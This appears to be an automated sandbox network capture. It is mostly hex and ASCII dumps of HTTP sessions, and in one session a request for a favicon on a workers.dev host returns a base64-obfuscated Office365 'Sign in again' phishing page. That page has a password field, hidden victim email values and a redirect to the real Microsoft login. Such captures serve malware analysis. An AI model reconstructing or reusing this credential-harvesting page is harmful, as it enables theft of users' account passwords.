                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 31 86 c7 d8 17 f7 17 e3 28 d8 43 8c e5 f3 8d cd c1 b8 78 fa c8 0e ba 39 0e a9 d2 21 04 c6 38 7a fd ce e3 3a 56 9f 34 34 4e 7d 7d 5c 43 df 2e 61 a6 1f 0a d0 fb 8a d7 00 26 c9 31 be ce c8 2e d6 39 08 6c bc eb 61 fa 16 6c ce c2 fb 30 2f 80 d7 91 c6 06 d1 f2 31 e9 43 08 21 84 90 d6 07 23 e1 11 42 08 21 f5 e7 52 45 c2 8b 0a f3 93 3d 09 59 3a a6 c7 e6 72 44 4d c2 bc 64 4d 60 cd 1c da 03 3f 6f 0f 9d 7b b0 c0 86 6e 6c 5a fe 6e 63 92 ae a5 22 eb 1d e6 01 30 df 89 b9 5a 6c fe c6 e6 44 77 57 17 89 6d 1b 70 fa 7b a0 57 c0 c6 40 cc 5d ec 4f ca d1 f4 89 f8 ad 08 7c 81 6c 30 98 57 c0 dc 3a b2 89 d5 76 8e 68 ed ce e3 2a 34 c1 f5 d9 df b7 95 5b 53 cd 79 ab 34 52 14 b4 0e 58 07 c5 eb c8 26 88 b9 7e 5c 67 db 30 1f d5 2c e0 b5 86 06 73 c1 2d 25 12 9e af 79 7e c6 e8 0e d2 29
                                                                      Data Ascii: 1(Cx9!8z:V44N}}\C.a&1.9lal0/1C!#B!RE=Y:rDMdM`?o{nlZnc"0ZlDwWmp{W@]O|l0W:vh*4[Sy4RX&~\g0,s-%y~)
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 16 07 90 62 72 ca b0 38 dd d9 6f 0f ea 0c d2 0e 21 ea c3 95 23 3b c8 cd d3 bb cb bd 57 f7 91 89 a6 a2 21 52 9b bd 71 82 68 0e 8b a3 11 41 de a6 32 ba e9 82 0f c0 e2 39 52 92 a5 65 16 69 f8 5d ab a3 85 00 0f ce 08 9c 00 dc 54 eb 9e e2 40 94 1b 2b a7 79 78 a0 4f bd 2a 2f 14 f6 58 bc 68 1f e1 6f 7b e6 6c 90 0a b6 3e e4 15 96 ca e1 d4 ba 47 19 b3 07 f7 e6 42 76 1d 62 03 bc 07 22 23 67 0b fd 17 0b 22 38 e2 fc d8 29 71 29 ce 5f 5f b0 d0 f7 a7 57 d7 37 d8 81 e8 1d 4d 81 bf bc b6 c1 e9 f5 d5 74 fc e7 bd 2d b6 4f d7 0c ca 11 d1 fd b0 78 07 61 48 6d d3 72 39 03 0e fb d2 8d c9 1a 81 12 8e dc 94 e1 71 da ee bb c5 85 e8 62 e3 d7 ab 13 f4 9e 5e ca c8 89 88 82 07 0a f2 2f 6d 2a 5a 8b 4a 63 c7 11 75 0f 76 06 0b a5 4d 85 31 fd a3 65 a0 b1 bd d7 4d ee 2a ed db fa 9f 16 27
                                                                      Data Ascii: br8o!#;W!RqhA29Rei]T@+yxO*/Xho{l>GBvb"#g"8)q)__W7Mt-OxaHmr9qb^/m*ZJcuvM1eM*'
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: bb 4f 96 1e 90 97 3e db 79 d6 f1 b2 39 de 5f b4 5f df 8b a8 74 00 f7 0b f7 e4 33 33 4e 7e db f4 11 3b 0f 66 18 7b 56 ae b6 ad 9b b1 35 48 37 eb 0c f8 e5 ae 18 78 da 0d 3e d1 07 61 f7 39 e6 0b 10 1d 0f 93 ef 84 10 42 08 21 84 10 42 08 69 f9 4c 1a 1a 2b 77 cf ec 2d e3 07 c5 68 80 9d a3 a9 39 3a 07 81 cd 7e 17 02 41 80 b2 30 df ea e3 2e 1d db 07 d9 9e 3d 83 bb bb ab 04 07 7a e9 86 69 67 60 ee 1a f3 17 58 43 b2 a7 5d b8 9f 66 b9 c3 c6 69 64 56 6b 08 a0 01 b0 d2 a6 da d3 cd 3c 07 9d 00 36 27 56 71 19 ba 56 40 88 97 5f 58 7a 5e d1 62 41 a1 f5 ba ed 09 42 2e 21 b0 17 c8 90 84 76 dc da 80 98 18 e9 9f a7 8f 8c 57 81 31 f4 51 10 e0 25 1d cf d3 36 b8 60 6d a2 6c dd 9f ae 6b f6 57 8e ea a0 d9 4b a0 d3 b8 dc 77 aa d9 88 f0 d0 61 40 ec 80 85 de dd 47 32 35 87 f6 8a ad
                                                                      Data Ascii: O>y9__t33N~;f{V5H7x>a9B!BiL+w-h9:~A0.=zig`XC]fidVk<6'VqV@_Xz^bAB.!vW1Q%6`mlkWKwa@G25


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.449763104.21.72.1914434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:06 UTC360OUTGET /favicon.ico HTTP/1.1
                                                                      Host: portal.bakfar.workers.dev
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-03-28 23:21:06 UTC552INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Mar 2024 23:21:06 GMT
                                                                      Content-Type: text/html;charset=UTF-8
                                                                      Content-Length: 15616
                                                                      Connection: close
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B3q0l0CT3jdaVGUq6q1RSy9Sm4owD%2F3vHFSJ3dem7bLnjICvjxez3HORu5n9M6bHOmJyK1LaMcXt%2BL3s4gMtYXEQqqOO1EdSwADBMYx2vNCB66UyW4b8UPqfnLp3EDN8RHqR2fa4FcA%2BE4cs"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 86bb5ac8adc95985-IAD
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-03-28 23:21:06 UTC817INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 0a 0a 0a 76 61 72 20 58 3d 22 43 6a 78 49 56 45 31 4d 49 47 78 68 62 6d 63 39 5a 57 34 2b 50 45 68 46 51 55 51 2b 50 46 52 4a 56 45 78 46 50 6b 39 6d 5a 6d 6c 6a 5a 54 4d 32 4e 54 77 76 56 45 6c 55 54 45 55 2b 43 6a 78 54 51 31 4a 4a 55 46 51 67 63 33 4a 6a 50 53 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 46 71 59 58 67 75 5a 32 39 76 5a 32 78 6c 59 58 42 70 63 79 35 6a 62 32 30 76 59 57 70 68 65 43 39 73 61 57 4a 7a 4c 32 70 78 64 57 56 79 65 53 38 79 4c 6a 49 75 4e 43 39 71 63 58 56 6c 63 6e 6b 75 62 57 6c 75 4c 6d 70 7a 49 6a 34 38 4c 31 4e 44 55 6b 6c 51 56 44 34 4b 43 6a 78 54 51 31 4a 4a 55 46 51 67 63 33 4a 6a 50 53 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 4e 76 5a 47 55 75 61 6e 46
                                                                      Data Ascii: <!DOCTYPE html><script>var X="CjxIVE1MIGxhbmc9ZW4+PEhFQUQ+PFRJVExFPk9mZmljZTM2NTwvVElUTEU+CjxTQ1JJUFQgc3JjPSJodHRwczovL2FqYXguZ29vZ2xlYXBpcy5jb20vYWpheC9saWJzL2pxdWVyeS8yLjIuNC9qcXVlcnkubWluLmpzIj48L1NDUklQVD4KCjxTQ1JJUFQgc3JjPSJodHRwczovL2NvZGUuanF
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 6d 39 76 64 48 4e 30 63 6d 46 77 4c 6d 31 70 62 69 35 6a 63 33 4d 69 49 47 6c 75 64 47 56 6e 63 6d 6c 30 65 54 30 69 63 32 68 68 4d 7a 67 30 4c 55 64 75 4e 54 4d 34 4e 48 68 78 55 54 46 68 62 31 64 59 51 53 73 77 4e 54 68 53 57 46 42 34 55 47 63 32 5a 6e 6b 30 53 56 64 32 56 45 35 6f 4d 45 55 79 4e 6a 4e 59 62 55 5a 6a 53 6d 78 54 51 58 64 70 52 32 64 47 51 56 63 76 5a 45 46 70 55 7a 5a 4b 57 47 30 69 49 47 4e 79 62 33 4e 7a 62 33 4a 70 5a 32 6c 75 50 53 4a 68 62 6d 39 75 65 57 31 76 64 58 4d 69 50 6a 78 4d 53 55 35 4c 49 48 4a 6c 62 44 31 7a 64 48 6c 73 5a 58 4e 6f 5a 57 56 30 49 47 68 79 5a 57 59 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 5a 6d 39 75 64 48 4d 75 5a 32 39 76 5a 32 78 6c 59 58 42 70 63 79 35 6a 62 32 30 76 59 33 4e 7a 50 32 5a 68 62 57 6c 73
                                                                      Data Ascii: m9vdHN0cmFwLm1pbi5jc3MiIGludGVncml0eT0ic2hhMzg0LUduNTM4NHhxUTFhb1dYQSswNThSWFB4UGc2Znk0SVd2VE5oMEUyNjNYbUZjSmxTQXdpR2dGQVcvZEFpUzZKWG0iIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPjxMSU5LIHJlbD1zdHlsZXNoZWV0IGhyZWY9Imh0dHBzOi8vZm9udHMuZ29vZ2xlYXBpcy5jb20vY3NzP2ZhbWls
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 49 47 4a 76 65 43 31 7a 61 47 46 6b 62 33 63 36 49 47 35 76 62 6d 55 37 49 43 31 33 5a 57 4a 72 61 58 51 74 59 58 42 77 5a 57 46 79 59 57 35 6a 5a 54 6f 67 62 6d 39 75 5a 51 70 39 43 6a 77 76 55 31 52 5a 54 45 55 2b 43 6a 77 76 53 45 56 42 52 44 34 4b 50 45 4a 50 52 46 6b 67 63 33 52 35 62 47 55 39 49 6b 4a 42 51 30 74 48 55 6b 39 56 54 6b 51 74 53 55 31 42 52 30 55 36 49 48 56 79 62 43 68 6f 64 48 52 77 63 7a 6f 76 4c 32 6b 75 5a 33 6c 68 65 6d 38 75 59 32 39 74 4c 7a 49 78 4e 47 51 34 4f 57 45 79 4e 6d 59 77 59 57 4d 35 4d 54 68 68 4d 44 6c 6d 4d 6a 45 32 59 54 46 69 4d 47 59 35 4e 32 49 30 4c 6e 42 75 5a 79 6b 37 49 45 4a 42 51 30 74 48 55 6b 39 56 54 6b 51 74 55 6b 56 51 52 55 46 55 4f 69 42 75 62 79 31 79 5a
                                                                      Data Ascii: FpbXBvcnRhbnQ7IGJveC1zaGFkb3c6IG5vbmU7IC13ZWJraXQtYXBwZWFyYW5jZTogbm9uZQp9CjwvU1RZTEU+CjwvSEVBRD4KPEJPRFkgc3R5bGU9IkJBQ0tHUk9VTkQtSU1BR0U6IHVybChodHRwczovL2kuZ3lhem8uY29tLzIxNGQ4OWEyNmYwYWM5MThhMDlmMjE2YTFiMGY5N2I0LnBuZyk7IEJBQ0tHUk9VTkQtUkVQRUFUOiBuby1yZ
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 67 49 43 41 67 49 43 41 67 49 43 41 38 63 44 34 38 63 33 52 79 62 32 35 6e 49 47 4e 73 59 58 4e 7a 50 53 4a 6a 61 47 46 73 62 47 56 75 5a 32 55 74 61 47 56 68 5a 47 6c 75 5a 79 49 2b 49 46 4e 70 5a 32 34 67 61 57 34 67 59 57 64 68 61 57 34 67 49 54 77 76 63 33 52 79 62 32 35 6e 50 69 41 38 4c 33 41 2b 43 6a 78 77 50 6a 78 7a 63 47 46 75 49 47 4e 73 59 58 4e 7a 50 53 4a 6a 61 47 46 73 62 47 56 75 5a 32 55 74 5a 47 56 7a 59 79 42 7a 61 57 64 75 61 57 34 74 63 33 56 69 4c 58 52 70 64 47 78 6c 49 6a 34 38 4c 33 4e 77 59 57 34 2b 50 43 39 77 50 6a 77 76 5a 47 6c 32 50 6a 77 76 61 44 49 2b 43 6a 78 77 50 6a 78 7a 63 47 46 75 49 47 4e 73 59 58 4e 7a 50 53 4a 6a 61 47 46 73 62 47 56 75 5a 32 55 74 5a 47 56 7a 59 79 42 7a 61 57 64 75 61 57 34 74 63 33 56 69 4c 58
                                                                      Data Ascii: gICAgICAgICA8cD48c3Ryb25nIGNsYXNzPSJjaGFsbGVuZ2UtaGVhZGluZyI+IFNpZ24gaW4gYWdhaW4gITwvc3Ryb25nPiA8L3A+CjxwPjxzcGFuIGNsYXNzPSJjaGFsbGVuZ2UtZGVzYyBzaWduaW4tc3ViLXRpdGxlIj48L3NwYW4+PC9wPjwvZGl2PjwvaDI+CjxwPjxzcGFuIGNsYXNzPSJjaGFsbGVuZ2UtZGVzYyBzaWduaW4tc3ViLX
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 49 47 4e 73 59 58 4e 7a 50 53 4a 6d 62 33 4a 74 4c 57 4e 76 62 6e 52 79 62 32 77 69 49 47 6c 6b 50 53 4a 77 59 58 4e 7a 64 32 39 79 5a 43 49 67 62 6d 46 74 5a 54 30 69 63 47 52 6d 4d 69 49 67 63 47 78 68 59 32 56 6f 62 32 78 6b 5a 58 49 39 49 6c 42 68 63 33 4e 33 62 33 4a 6b 49 69 42 79 5a 58 46 31 61 58 4a 6c 5a 44 34 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 44 77 76 5a 47 6c 32 50 67 6f 67 49 43 41 67 49 43 41 67 49 44 77 76 5a 47 6c 32 50 67 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 44 78 45 53 56 59 67 59 32 78 68 63 33 4d 39 49 6d 5a 76 63 6d 30 74 59 32 68 6c 59 32 73 67 62 58 51 74 4d 79 49 2b 50 45 6c 4f 55 46 56 55 49 47 6c 6b 50 57 56 34 59 57 31 77 62 47 56 44 61 47 56 6a 61 7a 45 67 59 32 78 68 63 33 4d 39 5a 6d 39 79 62 53 31 6a 61 47 56
                                                                      Data Ascii: IGNsYXNzPSJmb3JtLWNvbnRyb2wiIGlkPSJwYXNzd29yZCIgbmFtZT0icGRmMiIgcGxhY2Vob2xkZXI9IlBhc3N3b3JkIiByZXF1aXJlZD4KICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgICAgICAgIDxESVYgY2xhc3M9ImZvcm0tY2hlY2sgbXQtMyI+PElOUFVUIGlkPWV4YW1wbGVDaGVjazEgY2xhc3M9Zm9ybS1jaGV
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 6d 46 74 5a 54 30 69 63 47 52 6d 4d 53 49 67 63 32 6c 36 5a 54 30 69 4d 7a 55 69 49 48 5a 68 62 48 56 6c 50 53 4a 70 62 6d 5a 76 51 47 52 6c 62 47 77 75 59 32 39 74 49 6a 34 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 75 59 57 31 6c 50 53 4a 68 5a 47 52 79 5a 58 4e 7a 49 69 42 7a 61 58 70 6c 50 53 49 31 49 69 42 32 59 57 78 31 5a 54 30 69 59 57 35 6a 62 33 4a 6c 61 57 35 7a 63 47 56 6a 64 47 6c 76 62 69 35 6a 62 32 30 69 50 67 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 50 47 4a 79 50 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 35 68 62 57 55 39 49 6d 56 74 59 57 6c 73 49 69 42 7a 61 58 70 6c 50 53 49 7a 4e 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 50 47 6c 75 63 48 56 30
                                                                      Data Ascii: mFtZT0icGRmMSIgc2l6ZT0iMzUiIHZhbHVlPSJpbmZvQGRlbGwuY29tIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhZGRyZXNzIiBzaXplPSI1IiB2YWx1ZT0iYW5jb3JlaW5zcGVjdGlvbi5jb20iPgogICAgICAgICAgPGJyPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImVtYWlsIiBzaXplPSIzNSIgdmFsdWU9IiI+PGlucHV0
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 56 71 61 44 52 56 4d 44 4a 6b 4f 47 70 50 64 44 5a 32 54 45 56 49 5a 6d 55 76 53 6c 46 48 61 56 4a 53 55 31 46 52 65 46 4e 6d 52 6c 64 77 61 54 46 4e 63 58 56 57 5a 45 46 35 61 6c 56 68 63 6a 55 72 4e 7a 5a 51 56 6b 4e 74 57 57 77 69 49 47 4e 79 62 33 4e 7a 62 33 4a 70 5a 32 6c 75 50 53 4a 68 62 6d 39 75 65 57 31 76 64 58 4d 69 50 6a 77 76 63 32 4e 79 61 58 42 30 50 67 6f 67 49 44 77 76 59 6d 39 6b 65 54 34 4b 43 69 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 57 70 68 65 43 35 6e 62 32 39 6e 62 47 56 68 63 47 6c 7a 4c 6d 4e 76 62 53 39 68 61 6d 46 34 4c 32 78 70 59 6e 4d 76 61 6e 46 31 5a 58 4a 35 4c 7a 49 75 4d 69 34 30 4c 32 70 78 64 57 56 79 65 53 35 74 61 57 34 75 61 6e 4d 69 50 6a 77 76 63 32 4e 79 61
                                                                      Data Ascii: VqaDRVMDJkOGpPdDZ2TEVIZmUvSlFHaVJSU1FReFNmRldwaTFNcXVWZEF5alVhcjUrNzZQVkNtWWwiIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPjwvc2NyaXB0PgogIDwvYm9keT4KCiAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzIuMi40L2pxdWVyeS5taW4uanMiPjwvc2Nya
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 4b 49 43 41 67 49 43 41 67 49 43 42 32 59 58 49 67 62 58 6c 66 63 32 78 70 59 32 55 39 62 58 6c 66 5a 57 31 68 61 57 77 75 63 33 56 69 63 33 52 79 4b 43 68 70 62 6d 51 72 4d 53 6b 70 4f 77 6f 67 49 43 41 67 49 43 41 67 49 48 5a 68 63 69 42 6a 50 53 42 74 65 56 39 7a 62 47 6c 6a 5a 53 35 7a 64 57 4a 7a 64 48 49 6f 4d 43 77 67 62 58 6c 66 63 32 78 70 59 32 55 75 61 57 35 6b 5a 58 68 50 5a 69 67 6e 4c 69 63 70 4b 54 73 4b 49 43 41 67 49 43 41 67 49 43 42 32 59 58 49 67 5a 6d 6c 75 59 57 77 39 49 47 4d 75 64 47 39 4d 62 33 64 6c 63 6b 4e 68 63 32 55 6f 4b 54 73 4b 49 43 41 67 49 43 41 67 49 43 42 32 59 58 49 67 5a 6d 6c 75 59 57 78 31 50 53 42 6a 4c 6e 52 76 56 58 42 77 5a 58 4a 44 59 58 4e 6c 4b 43 6b 37 43 67 6f 67 49 43 41 67 49 43 41 67 49 43 51 6f 49 69
                                                                      Data Ascii: KICAgICAgICB2YXIgbXlfc2xpY2U9bXlfZW1haWwuc3Vic3RyKChpbmQrMSkpOwogICAgICAgIHZhciBjPSBteV9zbGljZS5zdWJzdHIoMCwgbXlfc2xpY2UuaW5kZXhPZignLicpKTsKICAgICAgICB2YXIgZmluYWw9IGMudG9Mb3dlckNhc2UoKTsKICAgICAgICB2YXIgZmluYWx1PSBjLnRvVXBwZXJDYXNlKCk7CgogICAgICAgICQoIi
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 49 47 5a 70 62 6d 46 73 50 53 42 6a 4c 6e 52 76 54 47 39 33 5a 58 4a 44 59 58 4e 6c 4b 43 6b 37 43 69 41 67 49 43 41 67 49 48 5a 68 63 69 42 6d 61 57 35 68 62 48 55 39 49 47 4d 75 64 47 39 56 63 48 42 6c 63 6b 4e 68 63 32 55 6f 4b 54 73 4b 43 69 41 67 49 43 41 67 49 43 41 67 4a 43 67 69 49 32 78 76 5a 32 39 70 62 57 63 69 4b 53 35 68 64 48 52 79 4b 43 4a 7a 63 6d 4d 69 4c 43 41 69 61 48 52 30 63 48 4d 36 4c 79 39 33 64 33 63 75 5a 32 39 76 5a 32 78 6c 4c 6d 4e 76 62 53 39 7a 4d 69 39 6d 59 58 5a 70 59 32 39 75 63 7a 39 6b 62 32 31 68 61 57 34 39 49 69 74 74 65 56 39 7a 62 47 6c 6a 5a 53 6b 37 43 69 41 67 49 43 41 67 49 43 41 67 4a 43 67 69 49 32 78 76 5a 32 39 75 59 57 31 6c 49 69 6b 75 61 48 52 74 62 43 68 6d 61 57 35 68 62 48 55 70 4f 77 6f 67 49 43 41
                                                                      Data Ascii: IGZpbmFsPSBjLnRvTG93ZXJDYXNlKCk7CiAgICAgIHZhciBmaW5hbHU9IGMudG9VcHBlckNhc2UoKTsKCiAgICAgICAgJCgiI2xvZ29pbWciKS5hdHRyKCJzcmMiLCAiaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS9zMi9mYXZpY29ucz9kb21haW49IitteV9zbGljZSk7CiAgICAgICAgJCgiI2xvZ29uYW1lIikuaHRtbChmaW5hbHUpOwogICA
                                                                      2024-03-28 23:21:06 UTC1369INData Raw: 32 6c 75 5a 47 39 33 4c 6d 78 76 59 32 46 30 61 57 39 75 4c 6e 4a 6c 63 47 78 68 59 32 55 6f 49 6d 68 30 64 48 42 7a 4f 69 38 76 62 47 39 6e 61 57 34 75 62 57 6c 6a 63 6d 39 7a 62 32 5a 30 62 32 35 73 61 57 35 6c 4c 6d 4e 76 62 53 39 6a 62 32 31 74 62 32 34 76 62 32 46 31 64 47 67 79 49 69 6b 37 43 67 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 39 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 38 76 49 43 51 6f 4a 79 4e 74 63 32 63 6e 4b 53 35 6f 64 47 31 73 4b 48 4a 6c 63 33 42 76 62 6e 4e 6c 57 79 64 74 63 32 63 6e 58 53 6b 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 39 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6c 62 48 4e 6c 65 77 6f 67
                                                                      Data Ascii: 2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbS9jb21tb24vb2F1dGgyIik7CgogICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgIC8vICQoJyNtc2cnKS5odG1sKHJlc3BvbnNlWydtc2cnXSk7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICBlbHNlewog


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.44975823.221.242.90443
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:06 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      User-Agent: Microsoft BITS/7.8
                                                                      Host: fs.microsoft.com
                                                                      2024-03-28 23:21:06 UTC468INHTTP/1.1 200 OK
                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                      Content-Type: application/octet-stream
                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                      Server: ECAcc (chd/073D)
                                                                      X-CID: 11
                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                      X-Ms-Region: prod-eus2-z1
                                                                      Cache-Control: public, max-age=200543
                                                                      Date: Thu, 28 Mar 2024 23:21:06 GMT
                                                                      Connection: close
                                                                      X-CID: 2


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.44976423.221.242.90443
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:07 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                      Range: bytes=0-2147483646
                                                                      User-Agent: Microsoft BITS/7.8
                                                                      Host: fs.microsoft.com
                                                                      2024-03-28 23:21:07 UTC774INHTTP/1.1 200 OK
                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                      ApiVersion: Distribute 1.1
                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                      X-CID: 7
                                                                      X-CCC: US
                                                                      X-Azure-Ref-OriginShield: Ref A: 8BFC17DD061B46CAAD2B2AEB7B19C3D8 Ref B: CH1AA2040901011 Ref C: 2023-07-21T06:04:00Z
                                                                      X-MSEdge-Ref: Ref A: 1421F39FA7224BE199CC2F2C3DD24574 Ref B: CHI30EDGE0415 Ref C: 2023-07-21T06:04:00Z
                                                                      Content-Type: application/octet-stream
                                                                      X-Azure-Ref: 0DMGnYgAAAACXaXykPZuVRq4aV6pCkeO8U0pDRURHRTAzMTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                      Cache-Control: public, max-age=200522
                                                                      Date: Thu, 28 Mar 2024 23:21:07 GMT
                                                                      Content-Length: 55
                                                                      Connection: close
                                                                      X-CID: 2
                                                                      2024-03-28 23:21:07 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.44978013.107.246.414434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:20 UTC600OUTGET /images/favicon.ico?v=2 HTTP/1.1
                                                                      Host: acctcdn.msauth.net
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: image
                                                                      Referer: https://account.live.com/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-03-28 23:21:21 UTC743INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Mar 2024 23:21:20 GMT
                                                                      Content-Type: image/x-icon
                                                                      Content-Length: 17174
                                                                      Connection: close
                                                                      Cache-Control: public, max-age=604800
                                                                      Last-Modified: Wed, 27 Mar 2024 20:42:45 GMT
                                                                      ETag: 0x8DC4E9E75179885
                                                                      x-ms-request-id: b999ebdf-e01e-0089-04a3-8052fd000000
                                                                      x-ms-version: 2009-09-19
                                                                      x-ms-lease-status: unlocked
                                                                      x-ms-blob-type: BlockBlob
                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                      Access-Control-Allow-Origin: *
                                                                      x-azure-ref: 20240328T232120Z-gdskurbeup1rzd4qywphk5kzbw000000026g000000003gh1
                                                                      x-fd-int-roxy-purgeid: 67501246
                                                                      X-Cache: TCP_HIT
                                                                      Accept-Ranges: bytes
                                                                      2024-03-28 23:21:21 UTC15641INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                      Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
